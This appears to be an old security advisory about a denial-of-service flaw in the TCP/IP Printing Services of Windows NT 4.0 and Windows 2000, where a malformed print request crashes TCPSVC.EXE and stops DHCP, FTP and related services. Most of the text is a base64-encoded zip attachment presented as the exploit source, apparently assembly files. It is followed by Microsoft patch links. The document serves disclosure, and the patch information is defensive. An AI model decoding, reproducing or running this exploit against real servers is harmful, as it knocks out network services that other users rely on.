COMMAND
TCP/IP Printing Services
SYSTEMS AFFECTED
- Microsoft Windows NT 4.0 Workstation
- Microsoft Windows NT 4.0 Server
- Microsoft Windows NT 4.0 Server, Enterprise Edition
- Microsoft Windows NT 4.0 Server, Terminal Server Edition
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Advanced Server
PROBLEM
TCP/IP Printing Services is an RFC 1179-compliant printing service
designed for environments that use the Berkeley Remote Printing
protocols, also known as LPD and LPR. (In Windows 2000, TCP/IP
Printing Services are also known as Print Services for Unix). A
specially-malformed print request could cause TCPSVC.EXE to crash,
which would not only prevent the server from providing printing
services, but also would stop several other services, most
importantly DHCP. Any affected services could be put back into
service by restarting them; it would not be necessary to reboot
the machine.
It is important to note that TCP/IP Printing Services is different
from the native Windows NT 4.0 and Windows 2000 printing
services. TCP/IP Printing Services is not installed by default,
and the vulnerability at hand here would not allow a malicious
user to disrupt printing via the native Windows NT 4.0 and
Windows 2000 printing services.
This bug was found originally by Ussr Labs. Accoriding to them,
services affected are:
SimpTCP,
DHCPServer
FTPSvc,
LPDSvc,
BinlSvc,
TCP/IP Print Request Server
Binary or Source for this D.o.S:
http://www.ussrback.com/
The D.O.S, stop the remote machine services:
SimpTCP,
DHCPServer,
FTPSvc,
LPDSvc,
BinlSvc,
and crash the TCP/IP Print Request Server. Below is mimed
version of exploit source:
---
Content-Type: application/octet-stream; name="tcpsvc.zip"
Content-Transfer-Encoding: base64
Content-Disposition: inline; filename="tcpsvc.zip"
Content-MD5: OB2LLyUsVVVLbnlg1Qr2dA==
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
BQAFAA4BAABCDQAAAAA=
-----
SOLUTION
Patch availability:
- Windows 2000 Professional, Server, and Advanced Server:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=19884
- Windows NT 4.0 Workstation, Windows NT 4.0 Server, and Windows NT 4.0 Server, Enterprise Edition:
Intel: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=20015
Alpha: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=20016
- Windows NT 4.0 Server, Terminal Server Edition:
To be released shortly